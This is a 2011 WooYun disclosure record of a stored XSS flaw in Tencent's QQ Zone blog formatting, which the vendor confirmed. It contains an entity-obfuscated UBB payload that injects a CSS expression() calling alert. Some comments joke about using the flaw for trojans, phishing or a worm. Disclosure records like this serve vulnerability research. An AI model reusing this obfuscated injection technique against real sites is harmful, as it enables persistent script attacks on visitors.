当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-01937

漏洞标题:QQ空间跨站

相关厂商:腾讯

漏洞作者: s!lly3r

提交时间:2011-04-19 23:03

修复时间:2011-05-20 00:00

公开时间:2011-05-20 00:00

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-04-19: 细节已通知厂商并且等待厂商处理中
2011-04-20: 厂商已经确认,细节仅向厂商公开
2011-04-30: 细节向核心白帽子及相关领域专家公开
2011-05-10: 细节向普通白帽子公开
2011-05-20: 细节向实习白帽子公开
2011-05-20: 细节向公众公开

简要描述:

XSS~`持久存储的

详细说明:

日志ubb代码

[ft=p,,A\002f\0026\0023\0033\0039\003b\003B\0026\0023\0031\0031\0039\003b\0026\0023\0031\0030\0035\003b\0026\0023\0031\0030\0030\003b\0026\0023\0031\0031\0036\003b\0026\0023\0031\0030\0034\003b\0026\0023\0035\0038\003b\0026\0023\0031\0030\0031\003b\0026\0023\0031\0032\0030\003b\0026\0023\0031\0031\0032\003b\0026\0023\0031\0031\0034\003b\0026\0023\0031\0030\0031\003b\0026\0023\0031\0031\0035\003b\0026\0023\0031\0031\0035\003b\0026\0023\0031\0030\0035\003b\0026\0023\0031\0031\0031\003b\0026\0023\0031\0031\0030\003b\0026\0023\0034\0030\003b\0026\0023\0039\0037\003b\0026\0023\0031\0030\0038\003b\0026\0023\0031\0030\0031\003b\0026\0023\0031\0031\0034\003b\0026\0023\0031\0031\0036\003b\0026\0023\0034\0030\003b\0026\0023\0034\0037\003b\0026\0023\0031\0032\0030\003b\0026\0023\0031\0031\0035\003b\0026\0023\0031\0031\0035\003b\0026\0023\0034\0037\003b\0026\0023\0034\0031\003b\0026\0023\0034\0031\003b\0026\0023\0035\0039\003b\0026\0023\0034\0037\003b\0026\0023\0034\0032\003b]xd[/ft]

漏洞证明:

修复方案:

^_^

版权声明:转载请注明来源 s!lly3r@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2011-04-20 09:12

厂商回复:

thx

最新状态:

暂无


漏洞评价:

评论

  1. 2011-04-20 12:19 | xDo ( 实习白帽子 | Rank:39 漏洞数:10 | …对那飘过的浮云说声我想你…)

    强大,应该公开一下下。。。。

  2. 2011-05-20 13:17 | 习惯一个人 ( 实习白帽子 | Rank:31 漏洞数:6 | 动荡年代,我只图个安宁…)

    这个牛B,哈,若是用来挂马或掉鱼,效果杠杠的.

  3. 2011-05-20 13:35 | pg5yl8 ( 实习白帽子 | Rank:91 漏洞数:12 | 我神马都不会 但我常常被人日 这是为神马呢)

    好邪恶啊

  4. 2011-05-20 13:43 | 昆仑心然 ( 路人 | Rank:19 漏洞数:3 )

    6分....

  5. 2011-05-20 20:33 | p.z 认证白帽子 ( 普通白帽子 | Rank:411 漏洞数:40 )

    6分...

  6. 2011-05-20 20:51 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    6分...

  7. 2011-05-27 15:50 | 葉孒 ( 实习白帽子 | Rank:37 漏洞数:5 | 呵呵)

    6分...

  8. 2011-06-29 13:22 | 蚊虫 ( 实习白帽子 | Rank:36 漏洞数:12 | 我装逼这么牛可还是没妞喜欢我)

    6分...卖钱的话应该可以加几个零

  9. 2011-07-29 10:41 | rayh4c ( 普通白帽子 | Rank:240 漏洞数:23 )

    赞 和腾讯杠上了 你 - -

  10. 2011-07-29 14:52 | youstar ( 实习白帽子 | Rank:34 漏洞数:8 | 我们人啊~)

    咋把这些洞都爆了

  11. 2012-04-18 22:52 | 啤酒 ( 实习白帽子 | Rank:62 漏洞数:8 | 道不同.喝酒结盟)

    大牛

  12. 2012-10-26 15:24 | Black World ( 路人 | Rank:0 漏洞数:1 | 无孔不入)

    @习惯一个人 赞同,哈哈

  13. 2013-03-13 17:16 | 大肠精 ( 路人 | Rank:0 漏洞数:2 | 业余兴趣而已)

    你如果写成蠕虫再通报估计RANK可以达到20吧

  14. 2013-07-27 23:08 | 噬魂 ( 普通白帽子 | Rank:141 漏洞数:37 | 08安全团队)

    js加密的??